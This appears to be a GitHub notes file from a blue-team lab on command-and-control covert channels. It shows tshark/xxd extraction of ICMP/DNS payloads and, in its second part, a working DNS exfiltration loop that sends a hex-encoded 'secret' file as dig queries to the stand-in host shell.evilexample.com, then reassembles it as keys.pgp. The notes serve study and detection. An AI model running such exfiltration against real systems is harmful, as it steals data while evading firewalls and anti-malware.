-
Notifications
You must be signed in to change notification settings - Fork 0
/
Command and Control tricks
50 lines (25 loc) · 2.56 KB
/
Command and Control tricks
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
Practicing in Pretium lab (Blue Teams Lab/BTLO), I saw an infected machine communicating with C2 using ICMP (ping command). Bellow, some explanation about how to do it:
Source for both techniques: https://isc.sans.edu/diary/Packet+Tricks+with+xxd/10306
__________________________________________________________________________________________________________________________________________________________
1. Stripping headers and extracting data from a covert channel.
One method to establish a covert channel is to take the original packet, and wrap it into an encapsulating header. For example an ICMP or a DNS packet. The trick is to extract the payload, save it in a new file, and treat it as a new packet capture. The 'packetstan' blog [1] outlines one way to do so via scapy. But scapy is not as commonly installed and available as other tools like for example tshark (and well, xxd).
tshark can easily be used to extract the payload in hexadecimal format:
tshark -T fields -e data
to convert the hexadecimal payload into a binary files, just run it through xxd:
tshark -T fields -e data | xxd -r -p
The "-p" option will just accept a stream of hexadecimal data, without it, xxd expects it to be encoded in the very specific format usually see with xxd.
______________________________________________________________________________________________________________________________________________________________
2. File transfer via DNS
Another nice idea I demoed in class is a file transfer via DNS that works without special tools. For pentesters, this is helpful as it will first of all sneak past many firewalls, and secondly you do not need to install any special tools that may be picked up by anti-malware.
This idea is along the lines of what is discussed in Kevin Bong's SANS Master's project [2].
First, we convert the file to be transferred via xxd into a hex stream.
xxd -p secret > file.hex
next, we read each line from file.hex, and "transmit" it as a DNS query.
for b in `cat file.hex `; do dig $b.shell.evilexample.com; done
This does not need special privileges. On the DNS server, we can capture the messages via tcpdump or the query log.
tcdpump -w /tmp/dns -s0 port 53 and host system.example.com
Then, we extract the messages from the packet capture
tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt
The "uniq" may not be necessary, but I find that the DNS messages may be resend once in a while if the response isn't fast enough.
Finally, just reverse the hex encoding:
xxd -r -p < receivedu.txt > keys.pgp